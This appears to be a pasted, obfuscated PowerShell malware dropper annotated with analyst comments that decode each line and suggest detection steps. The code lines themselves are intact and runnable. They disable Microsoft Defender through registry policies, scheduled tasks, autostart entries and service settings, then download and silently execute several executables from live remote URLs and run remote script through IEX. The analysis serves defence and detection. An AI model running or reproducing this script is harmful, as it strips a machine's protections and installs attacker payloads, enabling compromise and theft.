
Untitled

a guest
Dec 11th, 2018
  # Analyst note: every command in this paste is hidden behind PowerShell's -f format
  # operator (reordered string fragments) plus a placeholder that is swapped for '\'.
  # This line decodes to: Add-MpPreference -ExclusionExtension .reg
  # i.e. it adds the .reg extension to Microsoft Defender's scan exclusions. No .reg file
  # is used anywhere on this page, so the purpose of the exclusion is not visible here.
  # Triage: compare Get-MpPreference exclusion lists against the approved baseline.
  1. &("{3}{5}{4}{2}{0}{1}" -f'e','ference','r','A','-MpP','dd')  -ExclusionExtension ("{1}{0}"-f'reg','.')
  # Defender policy tampering. Each line runs reg.exe against
  # HKLM\Software\Policies\Microsoft\Windows Defender (or a subkey) with /f (no prompt).
  # The string obfuscation is resolved by PowerShell before reg.exe is launched, so
  # process-creation logging with command lines shows the plain key and value names
  # even though the script text itself matches no simple keyword.
  # NOTE(review): on hosts with Defender Tamper Protection enabled these policy values
  # are expected to be ignored - confirm per build before relying on it.
  # reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f  (drops existing policy key)
  2. &("{0}{1}" -f're','g') ("{1}{0}"-f'lete','de') ((("{16}{13}{2}{11}{15}{8}{6}{5}{9}{7}{0}{14}{10}{12}{1}{3}{4}"-f 's{0','ws D','oft','efen','der','i','l','e','0}Po','ci','Microsoft{','ware','0}Windo','M{0}S','}','{','HKL'))-f  [chaR]92) ('/f')
  # ...\Windows Defender : DisableAntiSpyware = 1 (REG_DWORD)
  3. &("{0}{1}" -f 're','g') ("{1}{0}" -f'd','ad') ((("{1}{6}{7}{4}{2}{3}{11}{8}{10}{0}{9}{5}"-f 'ws ','HKL','4qJ','P','ftware','der','M','4qJSo','oft4qJWi','Defen','ndo','olicies4qJMicros'))."R`ep`LacE"(([ChAR]52+[ChAR]113+[ChAR]74),'\')) ('/v') ("{1}{2}{3}{0}"-f 'ware','Disa','b','leAntiSpy') ('/t') ("{2}{0}{1}"-f 'G_DW','ORD','RE') ('/d') "1" ('/f')
  # ...\Windows Defender : DisableAntiVirus = 1
  4. &("{0}{1}" -f're','g') ("{0}{1}"-f'a','dd') ((("{10}{0}{2}{15}{4}{1}{5}{17}{9}{12}{6}{11}{14}{7}{8}{3}{13}{16}"-f'LM{','ware','0}','ndows','ft','{0}','}M','sof','t{0}Wi','es','HK','ic','{0',' ','ro','So','Defender','Polici')) -F [cHAR]92) ('/v') ("{0}{1}{2}{3}" -f'Disab','leAn','tiViru','s') ('/t') ("{1}{2}{3}{0}" -f 'WORD','RE','G_','D') ('/d') "1" ('/f')
  # ...\Windows Defender\MpEngine : MpEnablePus = 0
  # (value name suggests potentially-unwanted-software detection - confirm)
  5. &("{1}{0}" -f'g','re') ("{1}{0}" -f'd','ad') ((("{1}{4}{2}{9}{12}{10}{5}{3}{7}{11}{6}{0}{8}"-f 'pEng','HKLM5a8Software5a8','li','s ','Po','ft5a8Window','8M','Defende','ine','cies5a','roso','r5a','8Mic')) -crepLaCE  '5a8',[CHar]92) ('/v') ("{2}{1}{0}" -f 's','ablePu','MpEn') ('/t') ("{1}{0}" -f 'D','REG_DWOR') ('/d') "0" ('/f')
  # ...\Windows Defender\Real-Time Protection : DisableBehaviorMonitoring = 1
  6. &("{1}{0}" -f'eg','r') ("{0}{1}" -f 'ad','d') ((("{9}{6}{11}{2}{0}{10}{8}{5}{4}{12}{3}{13}{7}{1}"-f'ies{0}Microso','tection','}Polic','r','e','ws D','0}Softwar','Real-Time Pro','Windo','HKLM{','ft{0}','e{0','fende','{0}'))  -f [CHAR]92) ('/v') ("{2}{0}{4}{3}{1}{5}{6}"-f 'isableBe','onit','D','M','havior','ori','ng') ('/t') ("{0}{1}{2}" -f 'RE','G_DWOR','D') ('/d') "1" ('/f')
  # ...\Real-Time Protection : DisableIOAVProtection = 1
  7. &("{1}{0}" -f'g','re') ("{1}{0}" -f 'dd','a') ((("{2}{11}{17}{15}{12}{6}{4}{10}{1}{3}{19}{21}{8}{7}{20}{5}{0}{18}{13}{14}{16}{9}"-f 'e','softK81','HKLMK81','Wi','i','81R','M','Defe','s ','tection','cro','Soft','81','m','e Pr','iciesK','o','wareK81Pol','al-Ti','ndo','nderK','w'))-cREPLace  ([Char]75+[Char]56+[Char]49),[Char]92) ('/v') ("{1}{3}{4}{5}{2}{0}" -f 'otection','Disa','r','bleI','OAV','P') ('/t') ("{2}{0}{1}"-f 'W','ORD','REG_D') ('/d') "1" ('/f')
  # ...\Real-Time Protection : DisableOnAccessProtection = 1
  8. &("{0}{1}"-f're','g') ("{0}{1}"-f 'a','dd') ((("{3}{1}{19}{11}{0}{18}{5}{4}{15}{20}{7}{21}{17}{9}{13}{2}{14}{10}{22}{6}{16}{8}{12}"-f 'ftwar','0','f','HKLM{','c','i','e','{0}Micro','e Protect','{0}Windows','er','o','ion',' De','end','ie','al-Tim','t','e{0}Pol','}S','s','sof','{0}R'))-f [CHaR]92) ('/v') ("{5}{2}{7}{4}{1}{6}{0}{3}" -f'c','A','sabl','tion','n','Di','ccessProte','eO') ('/t') ("{0}{1}{2}"-f 'REG_DW','OR','D') ('/d') "1" ('/f')
  # ...\Real-Time Protection : DisableRealtimeMonitoring = 1
  9. &("{0}{1}"-f 're','g') ("{0}{1}"-f'ad','d') ((("{12}{14}{13}{4}{9}{16}{10}{3}{15}{0}{7}{17}{11}{8}{2}{6}{1}{5}"-f 'fe','ct','Time Prot','6Windows D','tware','ion','e','n','al-','1k6Policies1k6Mic','t1k','e','H','M1k6Sof','KL','e','rosof','der1k6R')).("{1}{0}{2}"-f'PlA','Re','CE').Invoke('1k6','\')) ('/v') ("{2}{0}{1}{3}{4}{5}"-f'isa','b','D','leR','ealtime','Monitoring') ('/t') ("{0}{1}{2}" -f 'REG','_','DWORD') ('/d') "1" ('/f')
  # ...\Real-Time Protection : DisableScanOnRealtimeEnable = 1
  10. &("{1}{0}"-f'g','re') ("{0}{1}"-f'a','dd') ((("{13}{5}{2}{4}{16}{10}{7}{14}{0}{1}{11}{18}{3}{9}{6}{8}{17}{12}{15}" -f 'LXD','Windows ','DSoft','fen','w','LMLX','DReal-Tim','f','e','derLX','icroso','D','rot','HK','t','ection','areLXDPoliciesLXDM',' P','e'))-CReplAce ([CHAR]76+[CHAR]88+[CHAR]68),[CHAR]92) ('/v') ("{1}{4}{3}{0}{5}{7}{2}{6}"-f'R','DisableSca','nab','On','n','ealti','le','meE') ('/t') ("{0}{2}{1}" -f 'REG_','D','DWOR') ('/d') "1" ('/f')
  # ...\Windows Defender\Reporting : DisableEnhancedNotifications = 1
  11. &("{0}{1}"-f'r','eg') ("{1}{0}" -f 'dd','a') ((("{10}{11}{15}{3}{0}{6}{1}{7}{2}{4}{8}{12}{16}{14}{9}{17}{13}{5}"-f'{','Pol','oft','e','{0}','g','0}','icies{0}Micros','W','D','H','K','i','}Reportin','dows ','LM{0}Softwar','n','efender{0')) -f [cHAr]92) ('/v') ("{4}{0}{6}{3}{7}{8}{1}{2}{5}"-f 'i','No','tification','b','D','s','sa','leEnh','anced') ('/t') ("{1}{0}{2}"-f'R','REG_DWO','D') ('/d') "1" ('/f')
  # ...\Windows Defender\SpyNet : DisableBlockAtFirstSeen = 1
  12. &("{1}{0}"-f 'g','re') ("{0}{1}"-f'ad','d') ((("{13}{9}{8}{15}{11}{4}{16}{5}{17}{2}{12}{0}{18}{3}{1}{6}{7}{14}{10}" -f ' ','e','{0}Win','ef','icr','o','nder','{0}','ware{0}Po','}Soft','t','{0}M','dows','HKLM{0','SpyNe','licies','os','ft','D'))  -f  [ChAr]92) ('/v') ("{5}{0}{6}{4}{3}{2}{1}" -f 'leBlo','een','stS','r','i','Disab','ckAtF') ('/t') ("{0}{1}{2}" -f 'REG','_D','WORD') ('/d') "1" ('/f')
  # ...\Windows Defender\SpyNet : SpynetReporting = 0
  13. &("{0}{1}"-f're','g') ("{1}{0}" -f'dd','a') ((("{2}{10}{6}{8}{11}{9}{0}{4}{5}{1}{3}{7}" -f'e','enderxkFS','H','py','sxkFMi','crosoftxkFWindows Def','kFSoft','Net','warex','ci','KLMx','kFPoli'))  -replace ([cHaR]120+[cHaR]107+[cHaR]70),[cHaR]92) ('/v') ("{2}{0}{3}{1}"-f 'net','eporting','Spy','R') ('/t') ("{0}{1}" -f 'REG_D','WORD') ('/d') "0" ('/f')
  # ...\Windows Defender\SpyNet : SubmitSamplesConsent = 0
  14. &("{1}{0}"-f'g','re') ("{0}{1}" -f 'ad','d') ((("{17}{11}{13}{8}{16}{9}{7}{6}{14}{10}{2}{0}{4}{1}{15}{5}{3}{12}" -f 'ind',' Defe','sW','e','ows','pyN','sVasMicrosof','licie','tw','o','a','MVasS','t','of','tV','nderVasS','areVasP','HKL')) -replAce  ([cHAR]86+[cHAR]97+[cHAR]115),[cHAR]92) ('/v') ("{0}{1}{3}{2}{4}" -f 'SubmitSam','ple','n','sConse','t') ('/t') ("{0}{2}{1}" -f 'REG_DW','D','OR') ('/d') "0" ('/f')
  # Defender trace sessions. Both lines run reg add with Start = 0 (REG_DWORD) under
  # HKLM\System\CurrentControlSet\Control\WMI\Autologger\.
  # NOTE(review): Start = 0 on an Autologger session normally means the session is not
  # started at boot - confirm; the effect would be less Defender diagnostic logging.
  # ...\Autologger\DefenderApiLogger : Start = 0
  15. &("{1}{0}"-f'g','re') ("{0}{1}" -f'a','dd') ((("{15}{3}{10}{8}{0}{4}{7}{13}{11}{9}{16}{2}{5}{12}{14}{6}{1}" -f'lS','gger','gger','System{0','et','{0}','Lo','{0}C','tro','ol','}CurrentCon','MI{0}Aut','Defe','ontrol{0}W','nderApi','HKLM{0}','o'))-F [CHaR]92) ('/v') ("{1}{0}"-f 'art','St') ('/t') ("{1}{0}{2}"-f 'DWO','REG_','RD') ('/d') "0" ('/f')
  # ...\Autologger\DefenderAuditLogger : Start = 0
  16. &("{1}{0}"-f'eg','r') ("{1}{0}"-f'd','ad') ((("{15}{21}{22}{1}{19}{18}{3}{12}{8}{4}{11}{6}{2}{0}{14}{5}{7}{9}{17}{16}{13}{10}{20}" -f 'to','s','u','t{0','tro','og','0}WMI{0}A','ger{','n','0}Defe','o','l{','}Co','itL','l','HKLM{0','derAud','n','ontrolSe','tem{0}CurrentC','gger','}S','y'))  -F [CHAr]92) ('/v') ("{0}{1}"-f'Sta','rt') ('/t') ("{0}{1}{2}"-f 'REG_','DWO','RD') ('/d') "0" ('/f')
  # Scheduled-task tampering: each line decodes to
  #   schtasks /Change /TN "<task path>" /Disable
  # schtasks.exe is a separate process, so its command line carries the decoded task
  # path; Get-ScheduledTask on a suspect host shows which of these are left Disabled.
  # Task: Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh
  17. &("{2}{0}{1}"-f'ch','tasks','s') ("{1}{0}"-f 'ange','/Ch') ("{1}{0}" -f 'TN','/') ((("{2}{4}{7}{5}{3}{0}{13}{8}{1}{6}{10}{12}{11}{9}"-f'rd{0}E','rd','Microsoft{0','ua','}Win','0}ExploitG',' ','dows{','loitGua','h','MD','cy Refres','M poli','xp'))-F  [CHaR]92) ("{1}{0}{2}" -f 'a','/Dis','ble')
  # Task: Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance
  18. &("{0}{1}" -f'schtask','s') ("{1}{0}{2}"-f'a','/Ch','nge') ("{1}{0}"-f'N','/T') ((("{5}{1}{12}{13}{9}{2}{11}{0}{4}{7}{8}{10}{3}{6}"-f 'efenderN','cr','ows ','fender Cac','mSW','Mi','he Maintenance','indo','w','ind','s De','D','osoftNmSWindows','NmSW')) -RePLace  'NmS',[chAR]92) ("{0}{1}"-f '/D','isable')
  # Task: Microsoft\Windows\Windows Defender\Windows Defender Cleanup
  19. &("{0}{2}{1}"-f 'schta','ks','s') ("{0}{1}"-f '/Chan','ge') ("{1}{0}" -f 'N','/T') ((("{3}{0}{6}{10}{12}{9}{13}{2}{4}{8}{15}{11}{14}{5}{7}{1}" -f 'FWindows','eanup','f','Microsoftn1','ende','er ','n1FW','Cl','r','s','indo','dows Def','w',' De','end','n1FWin'))."rEp`l`ACE"(([cHaR]110+[cHaR]49+[cHaR]70),[STRing][cHaR]92)) ("{1}{2}{0}"-f'able','/Di','s')
  # Task: Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan
  20. &("{1}{2}{0}" -f 's','scht','ask') ("{0}{1}"-f'/Cha','nge') ("{1}{0}" -f'N','/T') ((("{12}{14}{13}{0}{6}{7}{9}{5}{10}{1}{11}{8}{15}{16}{3}{2}{4}" -f '0}Windo','0','nder S','efe','cheduled Scan','Defend','ws{0','}Window','Window','s ','er{','}','Mi','{','crosoft','s ','D')) -F  [ChAr]92) ("{1}{0}{2}"-f 'Disa','/','ble')
  # Task: Microsoft\Windows\Windows Defender\Windows Defender Verification
  21. &("{0}{1}{2}" -f 'schtas','k','s') ("{0}{1}{2}" -f'/','Chan','ge') ("{1}{0}"-f 'N','/T') ((("{10}{2}{9}{14}{6}{16}{12}{8}{5}{7}{1}{13}{15}{3}{11}{4}{0}"-f 'ion','D','ft{','Ver','icat','}Windows','0}W',' ','{0','0','Microso','if','dows Defender','efende','}Windows{','r ','in')) -F  [chAr]92) ("{2}{0}{1}" -f 'Di','sable','/')
  # Autostart removal: reg delete <key> /v <value> /f on three Run-related keys.
  # NOTE(review): the value names look like the Defender notification/tray autostart
  # entry - confirm against a clean image of the same Windows build.
  # HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run : "Windows Defender"
  22. &("{0}{1}"-f're','g') ("{1}{0}" -f'ete','del') ((("{12}{24}{6}{9}{3}{8}{1}{11}{19}{16}{13}{7}{20}{10}{23}{14}{5}{0}{4}{22}{17}{21}{18}{2}{15}"-f'{','of','d{0','ware{0','0','lorer','M{0}Sof','ers','}Micros','t','n{','t{0}W','H','CurrentV','Exp','}Run','s{0}','t','e','indow','io','upApprov','}Star','0}','KL'))-f[cHAR]92) ('/v') ("{2}{0}{4}{1}{3}" -f 'o',' Defe','Wind','nder','ws') ('/f')
  # HKCU\Software\Microsoft\Windows\CurrentVersion\Run : "Windows Defender"
  23. &("{1}{0}" -f'eg','r') ("{1}{0}"-f'te','dele') ((("{10}{12}{5}{6}{11}{4}{0}{8}{7}{2}{14}{1}{13}{3}{9}{15}" -f'oftYc','Curre','Y','tV','os','YcjSof','twareYc','ndows','jWi','ers','HKC','jMicr','U','n','cj','ionYcjRun'))-cRePLaCe'Ycj',[cHaR]92) ('/v') ("{3}{2}{0}{1}{4}" -f ' Def','e','dows','Win','nder') ('/f')
  # HKLM\Software\Microsoft\Windows\CurrentVersion\Run : "WindowsDefender"
  24. &("{1}{0}"-f 'g','re') ("{0}{1}"-f'del','ete') ((("{5}{10}{6}{1}{11}{8}{0}{3}{4}{9}{7}{2}"-f'Window','{0}Mic','un','s{0}','Current','HKL','e','ersion{0}R','ft{0}','V','M{0}Softwar','roso'))  -F[cHaR]92) ('/v') ("{2}{1}{0}"-f 'fender','ndowsDe','Wi') ('/f')
  # Shell-extension removal: reg delete <key> /f on the EPP context-menu handler for
  # files (*), directories and drives.
  # NOTE(review): EPP is presumably the Explorer "scan with Defender" entry - confirm.
  # A missing EPP key on all three classes is a cheap host-triage indicator.
  # HKCR\*\shellex\ContextMenuHandlers\EPP
  25. &("{1}{0}" -f'g','re') ("{0}{1}" -f'dele','te') ((("{7}{0}{1}{6}{8}{5}{12}{2}{4}{10}{9}{11}{3}"-f'{0}*{0}sh','elle','s','P','{','Menu','x{0}','HKCR','Context','}','0','EP','Handler')) -f[char]92) ('/f')
  # HKCR\Directory\shellex\ContextMenuHandlers\EPP
  26. &("{1}{0}" -f'eg','r') ("{1}{2}{0}"-f'e','del','et') ((("{2}{4}{5}{0}{7}{1}{3}{8}{6}" -f 'yOc','lex','H','OcUCo','KCRO','cUDirector','tMenuHandlersOcUEPP','Ushel','ntex'))."Re`p`lACE"(([cHAr]79+[cHAr]99+[cHAr]85),[sTrIng][cHAr]92)) ('/f')
  # HKCR\Drive\shellex\ContextMenuHandlers\EPP
  27. &("{0}{1}"-f're','g') ("{1}{0}" -f 'e','delet') ((("{5}{13}{8}{7}{0}{11}{14}{3}{4}{2}{6}{1}{12}{10}{9}"-f'Sshell','nd','ntextMenu','S','Co','HKCR','Ha','C','veD','PP','DCSE','exD','lers','DCSDri','C')).("{1}{0}" -f 'CE','RePLa').Invoke('DCS','\')) ('/f')
  # Service start-type tampering: reg add ... /v Start /t REG_DWORD /d 4 /f under
  # HKLM\System\CurrentControlSet\Services\<name>. A service Start value of 4 marks
  # the service or driver as disabled, which takes effect at the next boot.
  # Triage: Start = 4 on all five keys together is a strong indicator; these writes
  # normally need elevated rights, so also establish how the script obtained them.
  # ...\Services\WdBoot
  28. &("{1}{0}"-f 'eg','r') ("{0}{1}"-f'a','dd') ((("{7}{8}{11}{4}{6}{12}{0}{9}{5}{10}{1}{13}{2}{14}{3}" -f'C','QS','v','XbQWdBoot','b','et','QCurren','HKLM','XbQSy','ontrolS','Xb','stemX','t','er','ices'))."r`EplaCE"(([chaR]88+[chaR]98+[chaR]81),'\')) ('/v') ("{1}{0}"-f 'art','St') ('/t') ("{1}{0}{2}"-f'O','REG_DW','RD') ('/d') "4" ('/f')
  # ...\Services\WdFilter
  29. &("{1}{0}" -f'g','re') ("{0}{1}"-f 'a','dd') ((("{7}{8}{4}{9}{3}{5}{1}{2}{6}{0}" -f'r','vicesK7IWdF','ilt','tK','rre','7ISer','e','HKLMK7IS','ystemK7ICu','ntControlSe')).("{1}{0}{2}" -f 'l','REP','ACe').Invoke('K7I','\')) ('/v') ("{1}{0}"-f 'rt','Sta') ('/t') ("{2}{0}{1}" -f 'E','G_DWORD','R') ('/d') "4" ('/f')
  # ...\Services\WdNisDrv
  30. &("{1}{0}" -f 'eg','r') ("{1}{0}"-f'dd','a') ((("{12}{9}{8}{10}{14}{11}{1}{3}{13}{15}{0}{7}{5}{6}{4}{2}"-f 'Q','entC','v','ont','Dr','BJQWdNi','s','Services','BJQSystemBJQ','M','C','r','HKL','r','ur','olSetBJ'))."R`eplACE"('BJQ',[striNG][CHAr]92)) ('/v') ("{1}{0}"-f 'rt','Sta') ('/t') ("{1}{0}{2}"-f 'EG_','R','DWORD') ('/d') "4" ('/f')
  # ...\Services\WdNisSvc
  31. &("{0}{1}" -f 're','g') ("{0}{1}" -f'ad','d') ((("{1}{10}{7}{3}{2}{4}{9}{6}{11}{8}{0}{12}{5}" -f 'v','HKL','temSdYC','Sys','u','sSvc','Control','SdY','er','rrent','M','SetSdYS','icesSdYWdNi'))."ReP`laCe"(([CHaR]83+[CHaR]100+[CHaR]89),'\')) ('/v') ("{0}{1}"-f 'Star','t') ('/t') ("{1}{2}{0}" -f 'WORD','REG_','D') ('/d') "4" ('/f')
  # ...\Services\WinDefend
  32. &("{0}{1}"-f're','g') ("{1}{0}" -f'dd','a') ((("{8}{9}{4}{2}{12}{14}{3}{7}{5}{1}{11}{0}{6}{10}{13}" -f'ces','er','emFS','rre','st','ontrolSetFSKS','FSK','ntC','HKLMFSKS','y','WinDef','vi','K','end','Cu')).("{0}{1}"-f'R','EPlace').Invoke('FSK','\')) ('/v') ("{0}{1}" -f 'Star','t') ('/t') ("{2}{1}{0}"-f 'ORD','G_DW','RE') ('/d') "4" ('/f')
  33.  
  # First payload stage (IoCs below are decoded from this line and defanged).
  # (New-Object Net.WebClient).DownloadFile(url, path):
  #   url  = hxxps://s3.amazonaws[.]com/user-agreement/amazon.exe
  #   path = C:/Windows/temp/vlc_update.exe
  # The saved name differs from the downloaded name; the on-disk name resembles a media
  # player updater, so filename alone should not be trusted during triage.
  34. (&("{0}{2}{1}" -f'N','t','ew-Objec') ("{2}{3}{0}{1}"-f'ien','t','Ne','t.WebCl')).("{1}{2}{0}" -f'e','Do','wnloadFil').Invoke(("{8}{2}{6}{0}{3}{7}{1}{4}{5}{9}" -f'az','e','t','o','r-','agreemen','tps://s3.am','naws.com/us','h','t/amazon.exe'),("{3}{6}{4}{2}{1}{0}{5}" -f'lc_u','mp/v','e','C:','dows/t','pdate.exe','/Win'))
  # Start-Process -FilePath C:\Windows\temp\vlc_update.exe -ArgumentList "/VERYSILENT /MON_ID=8"
  # NOTE(review): /VERYSILENT is a silent-install switch of common installer frameworks;
  # the meaning of MON_ID=8 is not visible on this page.
  # Detection: powershell.exe writing then launching an .exe from C:\Windows\temp.
  35. &("{0}{1}{2}"-f'st','art','-process') -FilePath ((("{8}{5}{4}{1}{2}{10}{6}{11}{0}{7}{9}{3}" -f 'bvlc','in','do','.exe','W',':vBb','svBb','_up','C','date','w','tempvB'))  -rEpLACe([Char]118+[Char]66+[Char]98),[Char]92) -ArgumentList ("{1}{2}{0}{3}"-f 'T','/VERYSI','LEN',' /MON_ID=8')
  36.  
  # Three further download-and-run stages with one shape:
  #   (New-Object System.Net.WebClient).DownloadFile(url, path); Start-Process path
  # All three URLs are plain http to a load.php endpoint on a .xyz host, and all three
  # files are written to c:\windows\temp. IoCs are decoded from the lines and defanged.
  # No hash or signature check happens between download and execution.
  # url = hxxp://zenko[.]xyz/load.php     path = c:\windows\temp\mini.exe
  37. (&("{1}{2}{0}" -f'ct','New-O','bje') ("{5}{0}{1}{2}{3}{4}" -f'e','m.Net.Web','Clie','n','t','Syst')).("{2}{1}{0}{3}" -f'i','oadF','Downl','le').Invoke(("{5}{4}{1}{3}{2}{0}{6}"-f'oad.','k','/l','o.xyz','n','http://ze','php'), ((("{3}{0}{2}{1}{4}{6}{5}"-f 'ndows','pZ','ZaGtem','c:ZaGwi','aG','.exe','mini'))."r`EPlacE"(([cHAR]90+[cHAR]97+[cHAR]71),'\')));&("{2}{0}{1}" -f 'ces','s','Start-Pro') ((("{0}{5}{3}{1}{4}{2}" -f'c:','ows2E7','emp2E7mini.exe','nd','t','2E7wi'))."RE`pl`Ace"('2E7',[sTriNG][CHAr]92))
  # url = hxxp://loamerr[.]xyz/load.php   path = c:\windows\temp\mono.exe
  38. (&("{1}{0}{2}" -f'Ob','New-','ject') ("{3}{1}{2}{6}{0}{4}{5}"-f'b','.N','et.W','System','Clie','nt','e')).("{2}{1}{0}" -f 'oadFile','nl','Dow').Invoke(("{3}{4}{1}{2}{5}{0}"-f'd.php','rr.','x','ht','tp://loame','yz/loa'), ((("{5}{7}{4}{2}{0}{3}{6}{8}{1}" -f 'tempoXjm','e','Xj','on','so','c:oXjwindo','o.','w','ex')).("{0}{2}{1}" -f 'RePla','E','C').Invoke('oXj','\')));&("{0}{2}{1}"-f'Start-Proce','s','s') ((("{8}{1}{4}{2}{3}{7}{5}{0}{9}{6}" -f'e',':i0uwi','owsi0u','t','nd','ono.','e','empi0um','c','x'))-rePlAcE'i0u',[CHaR]92)
  # url = hxxp://conikox[.]xyz/load.php   path = c:\windows\temp\mana.exe
  39. (&("{2}{1}{0}"-f'ject','-Ob','New') ("{3}{5}{0}{2}{4}{1}"-f 't','ient','em.N','Sy','et.WebCl','s')).("{2}{1}{0}{3}" -f 'l','wnloadFi','Do','e').Invoke(("{4}{2}{3}{1}{6}{5}{0}" -f 'oad.php','k','t','p://coni','ht','yz/l','ox.x'), ((("{5}{4}{3}{0}{2}{1}"-f 'ws{0}','mp{0}mana.exe','te','ndo','{0}wi','c:')) -f  [CHAr]92));&("{0}{1}{2}" -f 'Sta','rt-Pro','cess') ((("{5}{3}{6}{2}{7}{4}{0}{1}"-f'ex','e','t','windows','}mana.','c:{0}','{0}','emp{0'))-F  [cHAr]92)
  40.  
  # Decodes to: IEX (New-Object Net.WebClient).DownloadString(url)
  #   url = hxxp://c.statcounter[.]com/11878954/0/301540dd/1/   (defanged)
  # Whatever text the URL returns is passed to Invoke-Expression and run as PowerShell.
  # NOTE(review): the host is a web-analytics counter, so this request may exist only to
  # register an execution hit - unverified; the response was not captured on this page.
  # Detection: the request leaves the host even if the response is not valid script,
  # so proxy/DNS logs for this path identify machines that reached this line.
  41. &("{0}{1}" -f 'I','EX') (&("{1}{0}{2}" -f'Ob','New-','ject') ("{1}{0}{2}"-f 'et.WebClie','N','nt')).("{1}{0}{2}" -f'stri','Download','ng').Invoke(("{14}{11}{8}{13}{9}{6}{1}{4}{0}{7}{2}{5}{12}{10}{3}"-f'om','er.','1','dd/1/','c','1878','atcount','/','p','/c.st','/301540','t','954/0',':/','ht'))